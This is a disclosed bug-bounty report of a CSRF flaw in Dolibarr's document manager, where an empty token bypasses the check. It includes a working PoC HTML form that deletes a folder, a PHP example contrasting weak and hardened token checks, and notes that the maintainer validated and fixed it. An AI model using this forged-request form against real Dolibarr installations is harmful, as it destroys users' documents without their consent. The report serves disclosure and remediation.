Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid
Reported on Jul 18th 2021

✍️ Description

In this directory, "https://demo.dolibarr.org/ecm/index.php?mainmenu=ecm&leftmenu=ecm&idmenu=167162", an attacker can perform a CSRF attack to remove any folder.

In this directory the application takes a parameter named "token". I set the "token" parameter to an empty value, as in "token=&action=add.....", to bypass the "token" check.

First open the following "PoC.html", then click the button that appears on the page; afterwards you will notice that the folder with section 211 has been removed.
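As an added illustration (not Dolibarr's code, and not the fix that was actually merged), the kind of token check that produces this bypass, next to a hardened version; the function names, the session key and the sample requests are assumed and constructed here:

```php
<?php
// Added example, not Dolibarr's own code. Names are assumptions.

// Weak pattern: the comparison only runs when a token was supplied,
// so a request carrying "token=" (empty) is treated as valid.
function verify_token_weak(array $request, array $session): bool
{
    $token = $request['token'] ?? '';
    if ($token !== '' && $token !== ($session['csrf_token'] ?? '')) {
        return false;
    }
    return true; // reached for an empty token: the check is skipped
}

// Hardened pattern: a state-changing action must come via POST, both the
// session token and the submitted token must be present and non-empty,
// and the comparison is constant-time.
function verify_token_strict(string $method, array $request, array $session): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $request['token'] ?? '';
    if ($expected === '' || $given === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

// Constructed sample data mirroring the report: a forged GET request with an
// empty token, and a genuine POST request carrying the session's token.
$session = ['csrf_token' => 'a1b2c3d4'];
$forged  = ['action' => 'confirm_deletedir', 'section' => '211', 'token' => ''];
$genuine = ['action' => 'confirm_deletedir', 'section' => '211', 'token' => 'a1b2c3d4'];

$label = fn(bool $ok) => $ok ? 'accepted' : 'rejected';
echo 'weak check, forged request:    ' . $label(verify_token_weak($forged, $session)) . PHP_EOL;
echo 'strict check, forged request:  ' . $label(verify_token_strict('GET', $forged, $session)) . PHP_EOL;
echo 'strict check, genuine request: ' . $label(verify_token_strict('POST', $genuine, $session)) . PHP_EOL;
```

Note that the PoC form on this page has no method attribute, so it submits via GET; requiring POST for destructive actions is a second, independent barrier on top of the non-empty token check.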

🕵️‍♂️ Proof of Concept

<!-- PoC.html -->

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/ecm/dir_card.php">
      <input type="hidden" name="section" value="211" />
      <input type="hidden" name="module" value="ecm" />
      <input type="hidden" name="backtopage" value="&#47;core&#47;ajax&#47;ajaxdirtree&#46;php&#63;file&#95;manager&#61;1&amp;website&#61;&amp;pageid&#61;" />
      <input type="hidden" name="action" value="confirm&#95;deletedir" />
      <input type="hidden" name="confirm" value="yes" />
      <!-- empty token value: the server-side check is skipped instead of failing -->
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="deletedirrecursive" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


💥 Impact

This vulnerability makes it possible to remove any folder from any user's documents.

We have contacted a member of the dolibarr team and are waiting to hear back (8 days ago)
Laurent Destailleur validated this vulnerability (6 days ago)
amammad has been awarded the disclosure bounty: $40
The fix bounty is now up for grabs: $10
Laurent Destailleur confirmed that a fix has been merged on 0e18bd (6 days ago)
Laurent Destailleur has been awarded the fix bounty: $10